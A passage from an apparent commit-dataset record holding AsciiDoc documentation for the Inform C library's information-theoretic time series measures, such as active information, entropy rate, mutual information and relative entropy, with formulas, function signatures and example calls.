between two distributions\nstem:[p_X] and stem:[q_X] measures the amount of information needed to identify events\nusing a coding scheme optimized for stem:[q_X] when stem:[p_X] is the \"real\" distributions\nover stem:[X].\n[stem]\n++++\nH(p,q) = -\\sum_{x} p(x) \\log_2{q(x)}\n++++\nCross entropy's local variant is equivalent to the self-information of stem:[q_X], and as\nsuch is implemented by <<inform_local_block_entropy,inform_local_block_entropy>>.\n\nSee <<Cover1991>> for more details.\n****\n[[inform_cross_entropy]]\n[source,c]\n----\ndouble inform_cross_entropy(int const *ps, int const *qs, size_t n,\n int b, inform_error *err);\n----\nCompute the cross entropy between the \"true\" and \"unnatural\" distributions stem:[p_X] and\nstem:[q_X] from associated time series `ps` and `qs`, respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble ce = inform_cross_entropy(ps, qs, 10, 2, 
&err);\nassert(inform_succeeded(&err));\n\/\/ ce == 1.003530\n\nce = inform_cross_entropy(qs, ps, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.912454\n----\n****\n\n[[effective-information]]\n== Effective Information\n\n****\n[[inform_effective_info]]\n[source,c]\n----\ndouble inform_effective_info(double const *tpm, double const *inter,\n size_t n, inform_error *err);\n----\n****\n\n[[entropy-rate]]\n== Entropy Rate\nhttps:\/\/en.wikipedia.org\/wiki\/Entropy_rate[Entropy rate] quantifies the amount of\ninformation needed to describe the next state of stem:[X] given observations of\nstem:[X^{(k)}]. In other wrods, it is the entropy of the time series conditioned on the\nstem:[k]-histories. The local entropy rate\n[stem]\n++++\nh_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\ncan be averaged to obtain the global entropy rate\n[stem]\n++++\nH_X(k) = \\langle h_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\nMuch as with <<active-info, active information>>, the local and average entropy rates are\nformally obtained in the limit\n[stem]\n++++\nh_{X,i} = \\lim_{k\\rightarrow \\infty}h_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nH_X = \\lim_{k\\rightarrow \\infty}H_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_entropy_rate]]\n[source,c]\n----\ndouble inform_entropy_rate(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble er = inform_entropy_rate(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.679270\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er = inform_entropy_rate(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.625349\n----\n****\n\n****\n[[inform_local_entropy_rate]]\n[source,c]\n----\ndouble *inform_local_entropy_rate(int const *series, size_t n,\n size_t m, int b, size_t k, double *er, inform_error *err);\n----\nCompute the local entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *er = inform_local_entropy_rate(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 1.000, 0.000, 0.585, 0.585, 1.585, 0.000, 1.000 }\nfree(er);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er[14];\ninform_local_entropy_rate(series, 2, 9, 2, 2, er, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 0.415, 1.585, 0.585, 0.585, 1.585, 0.000, 2.000,\n\/\/ 0.000, 0.415, 0.585, 0.000, 0.415, 0.585, 0.000 }\n\n\/\/ no need to free since `er` was statically allocated in this scope\n\/\/ free(er);\n----\n****\n\n[[excess-entropy]]\n== Excess Entropy\n\n****\n[[inform_excess_entropy]]\n[source,c]\n----\ndouble inform_excess_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\n****\n\n****\n[[inform_local_excess_entropy]]\n[source,c]\n----\ndouble 
*inform_local_excess_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ee, inform_error *err);\n----\n****\n\n[[information-flow]]\n== Information Flow\n\n****\n[[inform_information_flow]]\n[source,c]\n----\ndouble inform_information_flow(int const *src, int const *dst,\n int const *back, size_t l_src, size_t l_dst, size_t l_back,\n size_t n, size_t m, int b, inform_error *err);\n----\n****\n\n[[evidence-of-integration]]\n== Evidence Of Integration\n\n****\n[[inform_integration_evidence]]\n[source,c]\n----\ndouble *inform_integration_evidence(int const *series, size_t l,\n size_t n, int const *b, double *evidence, inform_error *err);\n----\n****\n\n****\n[[inform_integration_evidence_part]]\n[source,c]\n----\ndouble *inform_integration_evidence_part(int const *series, size_t l,\n size_t n, int const *b, size_t const *parts, size_t nparts,\n double *evidence, inform_error *err);\n----\n****\n\n[[mutual-information]]\n== Mutual Information\nhttps:\/\/en.wikipedia.org\/wiki\/Mutual_information[Mutual information] (MI) is a measure of\nthe amount of mutual dependence between at least two random variables. Locally, MI is\ndefined as\n[stem]\n++++\ni_i(X_1,\\ldots,X_l) = \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nThe mutual information is then just the time average of stem:[i_i(X_1,\\ldots,X_l)]:\n[stem]\n++++\nI(X_1,\\ldots,X_l) =\n \\sum_{x_{1,i},\\ldots,x_{l,i}} p(x_{1,i},\\ldots,x_{l,i}) \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nSee <<Cover1991>> for more details.\n\n****\n[[inform_mutual_info]]\n[source,c]\n----\ndouble inform_mutual_info(int const *series, size_t l, size_t n,\n int const *b, inform_error *err);\n----\nCompute the mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 0.214171\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\ndouble mi = inform_mutual_info(xs, 3, 20, (int[3]){2,2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 1.095462\n----\n****\n\n****\n[[inform_local_mutual_info]]\n[source,c]\n----\ndouble *inform_local_mutual_info(int const *series, size_t l, size_t n,\n int const *b, double *mi, inform_error *err);\n----\nCompute the local mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. 
Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble *mi = inform_local_mutual_info(xs, 2, 20, (int[2]){2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { -1.000, -1.000, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 1.585, 1.585, 1.585, -1.585 }\nfree(mi);\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\n\ndouble *mi = inform_local_mutual_info(xs, 3, 20, (int[3]){2,2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 3.322, 3.322, 0.322, 0.152 }\nfree(mi);\n----\n****\n\n[[partial-information-decomposition]]\n== Partial Information Decomposition\n\n****\n[[inform_pid_source]]\n[source,c]\n----\ntypedef struct inform_pid_source\n{\n size_t *name;\n struct inform_pid_source **above;\n struct inform_pid_source **below;\n size_t size, n_above, n_below;\n double imin;\n double pi;\n double info;\n} inform_pid_source;\n----\n****\n\n\n\n\ninform_pid_lattice *inform_pid(int const *stimulus, int const *responses,\n size_t l, size_t n, int bs, int const *br, inform_error *err);\n\n#ifdef __cplusplus\n}\n#endif\n\n****\n[[inform_pid_lattice]]\n[source,c]\n----\ntypedef struct inform_pid_lattice\n{\n inform_pid_source **sources;\n inform_pid_source *top;\n inform_pid_source *bottom;\n size_t size;\n} inform_pid_lattice;\n----\n****\n\n****\n[[inform_pid_lattice_free]]\n[source,c]\n----\nvoid inform_pid_lattice_free(inform_pid_lattice *l);\n----\n****\n\n****\n[[inform_pid]]\n[source,c]\n----\ninform_pid_lattice *inform_pid(int const *stimulus,\n int const *responses, size_t l, size_t n, int bs,\n int const *br, inform_error *err);\n----\n****\n\n[[predictive-information]]\n== Predictive Information\n\n****\n[[inform_predictive_info]]\n[source,c]\n----\ndouble inform_predictive_info(int const *series, size_t n, size_t m,\n int b, size_t kpast, size_t kfuture, inform_error *err);\n----\n****\n\n****\n[[inform_local_predictive_info]]\n[source,c]\n----\ndouble *inform_local_predictive_info(int const *series, size_t n,\n size_t m, int b, size_t kpast, size_t kfuture, double *pi,\n inform_error *err);\n----\n****\n\n[[relative-entropy]]\n== Relative Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Kullback%E2%80%93Leibler_divergence[Relative entropy], also\nknown as the Kullback-Leibler divergence, measures the amount of information gained in\nswitching from a prior distribution stem:[q_X] to a posterior distribution stem:[p_X] over\n_the same support_:\n[stem]\n++++\nD_{KL}(p||q) = \\sum_{x_i} p(x_i) \\log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nThe local counterpart is\n[stem]\n++++\nd_{KL,i}(p||q) = log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nNote that the average in moving from the local to the non-local relative entropy is taken\nover the posterior distribution.\n\nSee <<Kullback1951>> and <<Cover1991>> for more information.\n\n****\n[[inform_relative_entropy]]\n[source,c]\n----\ndouble inform_relative_entropy(int const *xs, int const *ys, size_t n,\n 
int b, inform_error *err);\n----\nCompute the relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble re = inform_relative_entropy(xs, ys, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.278072\n\nre = inform_relative_entropy(ys, xs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.321928\n----\n****\n\n****\n[[inform_local_relative_entropy]]\n[source,c]\n----\ndouble *inform_local_relative_entropy(int const *xs, int const *ys,\n size_t n, int b, double *re, inform_error *err);\n----\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble *re = inform_local_relative_entropy(xs, ys, 10, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { 0.678, -1.322, 0.678, 0.678, 0.678, 0.678, 0.678,\n\/\/ 0.678, 0.678, -1.322 };\n\ninform_local_relative_entropy(ys, xs, 10, 2, re, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { -0.678, 1.322, 1.322, 1.322, 1.322, -0.678, -0.678, 1.322,\n\/\/ -0.678, -0.678 }\n\nfree(re);\n----\n****\n\n[[separable-information]]\n== Separable Information\n\n****\n[[inform_separable_info]]\n[source,c]\n----\ndouble inform_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_separable_info]]\n[source,c]\n----\ndouble *inform_local_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k, double *si,\n inform_error *err);\n----\n****\n\n[[transfer-entropy]]\n== Transfer Entropy\n\n****\n[[inform_transfer_entropy]]\n[source,c]\n----\ndouble inform_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_transfer_entropy]]\n[source,c]\n----\ndouble *inform_local_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n double *te, inform_error *err);\n----\n****\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9c24fd3007a279f3ce7bc1a32c177a01da0f75bd","subject":"Add header information to time series measures","message":"Add header information to time series measures\n","repos":"ELIFE-ASU\/Inform,dglmoore\/Inform,ELIFE-ASU\/Inform,dglmoore\/Inform","old_file":"docs\/timeseries.adoc","new_file":"docs\/timeseries.adoc","new_contents":"[[time-series-measures]]\n= Time Series Measures\n\nThe original purpose of *Inform* was to analyze time series data. This explains why most of\n*Inform*'s functionality resides in functions specifically optimized for analyzing time\nseries. The API was designed to be easy to use in C or {cpp}, or to be wrapped in a\nhigher-level language, e.g. https:\/\/elife-asu.github.io\/PyInform[Python]. This means that we\navoided some of the \"niceties\" of C, such as extensive use of macros and other generic\natrocities, in favor of wrappability. Keep this in mind as you learn the API.\n\nMany information measures have \"local\" variants which compute a time series of point-wise\nvalues. 
These local variants have names similar to their averaged or global counterparts,\ne.g. <<inform_active_info,inform_active_info>> and\n<<inform_local_active_info,inform_local_active_info>>. We have been meticulous in ensuring\nthat function and parameter names are consistent across measures. If you notice some\ninconsistency, please https:\/\/github.com\/elife-asu\/inform\/issue[report it as an issue].\n\n[[time-series-notation]]\n== Notation\n\nThroughout the discussion of time series measures, we will try to use a consistent notation.\nWe will denote random variables as stem:[X,Y,\\ldots], and let stem:[x_i,y_i,\\ldots]\nrepresent the stem:[i]-th time step of a time series drawn from the associated random\nvariable. Many of the measures consider stem:[k]-histories (a.k.a. stem:[k]-blocks) of the\ntime series, e.g. stem:[x_i^{(k)} = \\left\\{x_{i-k+1}, x_{i-k+2},\\ldots,x_i\\right\\}].\n\nWhen denoting probability distributions, we will only make the random variable explicit in\nsituations where the notation is ambiguous. We will typically write stem:[p(x_i)],\nstem:[p(x_i^{(k)})], and stem:[p(x_i^{(k)}, x_{i+1})] to denote the empirical probability\nof observing the stem:[x_i] state, the stem:[x_i^{(k)}] stem:[k]-history, and the joint\nprobability of observing stem:[\\left(x_i^{(k)}, x_{i+1}\\right)].\n\n*Please report any notational ambiguities as an\nhttps:\/\/github.com\/elife-asu\/inform\/issue[issue].*\n\n[[time-series-detail]]\n== Implementation Details\n\n=== The Base: States and Logarithms\nThe word \"base\" has two different meanings in the context of information measures on time\nseries. It could refer to the base of the time series itself, that is the number of unique\nstates in the time series. For example, the time series stem:[\\{0,2,1,0,0\\}] is a base-3\ntime series. On the other hand, it could refer to the base of the logarithm used in\ncomputing the information content of the inferred probability distributions. The problem is\nthat these two meanings clash. The base of the time series affects the range of values the\nmeasure can produce, and the base of the logarithm represents a rescaling of those values.\n\nIn this library we deal with this by *always* using base-2 logarithms, and having the user\nspecify the base of the time series \u2014 don't worry, we <<error-handling, set an error>> if\nthe provided base doesn't make sense. All of this ensures that the library is as simple as\nreasonably possible.\n\n=== Multiple Initial Conditions\nYou generally need *a lot* of data to infer a probability distribution. An experimentalist\nor simulator might then collect data over multiple trials or initial conditions. Most of\n*Inform*'s time series measures allow the user to pass in a two-dimensional, rectangular\narray with each row representing a time series from a different initial condition. From\nthis the probability distributions are inferred, and the desired value is calculated. This\nhas the downside of requiring that the user store all of the data in memory, but it has the\nadvantage of being fast and simple. Trade-offs, man...\n\nA subsequent release, https:\/\/github.com\/elife-asu\/inform\/milestone\/3[likely v1.1.0], will\nallow the initial conditions to have time series of different lengths and will provide\naccumulator implementations of all of these measures that will let the user incrementally\nconstruct the distributions. 
This will lift some of the memory burden at the expense of\nruntime performance.\n\n=== Calling Conventions\nAll of the time series functions described in this section use the same basic calling\nconventions and use the same (or similar) argument names where possible.\n\n|===\n| Argument Name | Description\n\n| `series`\n| A 2-D or 3-D, finite-state time series in contiguous, row-major form\n\n| `l`\n| The number of \"sources\" or variables in a 3-D time series\n\n| `n`\n| The number of initial conditions per \"source\"\n\n| `m`\n| The number of time steps per \"source\"\n\n| `b`\n| The base of the time series\n\n| `k`\n| The history length\n\n| `err`\n| An error argument\n|===\n\nAverage measures generally return a double-precision, floating-point value while local\nvariants return a pointer to an appropriately shaped, contiguous array. Local measures\naccept an argument, often named after the function (e.g. local active information takes an\n`ai` argument), which is used to store the computed local values. If that argument is NULL,\nthen the function allocates an array.\n\nWe will try to note any deviations from these conventions.\n\n[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \\langle a_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \\lim_{k\\rightarrow \\infty}a_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nA_X = \\lim_{k\\rightarrow \\infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n[horizontal]\nHeader:: `inform\/active_info.h`\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 
[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \log_2{\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}},\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \langle a_{X,i}(k) \rangle_i\n = \sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \log_2{\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \lim_{k\rightarrow \infty}a_{X,i}(k)\n\qquad \textrm{and} \qquad\nA_X = \lim_{k\rightarrow \infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/inform\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n[horizontal]\nHeader:: `inform\/active_info.h`\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 0.222}\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai[14];\ninform_local_active_info(series, 2, 9, 2, 2, ai, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ { 0.807, -0.363, 0.637, 0.637, -0.778, 0.807, -1.193,\n\/\/ 0.807, 0.807, 0.222, 0.807, 0.807, 0.222, 0.807 }\n\n\/\/ no need to free since `ai` was allocated on the stack in this scope\n\/\/ free(ai);\n----\n[horizontal]\nHeader:: `inform\/active_info.h`\n****\n\n
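Because stem:[A_X(k)] is defined as the time average of the local values, the two functions above must agree with one another; the following sketch checks that directly (it assumes `<math.h>` for `fabs` and uses a small tolerance to absorb floating-point rounding).\n\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\ndouble avg = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\ndouble *local = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\n\/\/ with m = 9 and k = 2 there are 7 local values; their mean is the average AI\ndouble mean = 0.0;\nfor (size_t i = 0; i < 7; ++i) mean += local[i] \/ 7;\nassert(fabs(mean - avg) < 1e-6);\nfree(local);\n----\n\n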
[[block-entropy]]\n== Block Entropy\nBlock entropy, also known as stem:[N]-gram entropy <<Shannon1948>>, is the standard Shannon\nentropy of the stem:[k]-histories of a time series:\n[stem]\n++++\nH(X^{(k)}) = -\sum_{x_i^{(k)}} p(x_i^{(k)}) \log_2{p(x_i^{(k)})}\n++++\nwhich reduces to the traditional Shannon entropy for stem:[k=1].\n\n****\n[[inform_block_entropy]]\n[source,c]\n----\ndouble inform_block_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k = 1\ndouble h = inform_block_entropy(series, 1, 9, 2, 1, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 0.991076\n\n\/\/ k = 2\nh = inform_block_entropy(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.811278\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h = inform_block_entropy(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.936278\n----\n[horizontal]\nHeader:: `inform\/block_entropy.h`\n****\n\n****\n[[inform_local_block_entropy]]\n[source,c]\n----\ndouble *inform_local_block_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ent, inform_error *err);\n----\nCompute the local block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k == 1\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 0.848, 0.848, 1.170, 1.170, 1.170, 1.170, 0.848, 0.848, 0.848 }\nfree(h);\n\n\/\/ k == 2\nh = inform_local_block_entropy(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 3.000, 1.415, 1.415, 1.415, 3.000, 1.415, 1.415 }\nfree(h);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h[16];\ninform_local_block_entropy(series, 2, 9, 2, 2, h, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 2.415, 2.415, 2.415, 2.415, 2.000, 1.415, 1.415,\n\/\/ 2.000, 1.415, 2.415, 2.000, 1.415, 2.415, 2.000, 1.415 }\n\n\/\/ no need to free since `h` was allocated on the stack in this scope\n\/\/ free(h);\n----\n[horizontal]\nHeader:: `inform\/block_entropy.h`\n****\n\n[[conditional-entropy]]\n== Conditional Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Conditional_entropy[Conditional entropy] is a measure of the\namount of information required to describe a random variable stem:[Y] given knowledge of\nanother random variable stem:[X]. When applied to time series, two time series are used to\nconstruct the empirical distributions, and <<inform_shannon_ce,inform_shannon_ce>> can be\napplied to yield\n[stem]\n++++\nH(Y|X) = - \sum_{x_i,y_i} p(x_i,y_i) \log_2{p(y_i|x_i)}.\n++++\nThis can be viewed as the time-average of the local conditional entropy\n[stem]\n++++\nh_i(Y|X) = -\log_2{p(y_i|x_i)}.\n++++\nSee <<Cover1991>> for more information.\n\n****\n[[inform_conditional_entropy]]\n[source,c]\n----\ndouble inform_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, inform_error *err);\n----\nCompute the conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but they may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble ce = inform_conditional_entropy(xs, ys, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce ~ 0.597107\n\nce = inform_conditional_entropy(ys, xs, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce ~ 0.507757\n----\n[horizontal]\nHeader:: `inform\/conditional_entropy.h`\n****\n\n****\n[[inform_local_conditional_entropy]]\n[source,c]\n----\ndouble *inform_local_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, double *mi, inform_error *err);\n----\nCompute the local conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but they may have different bases `bx` and 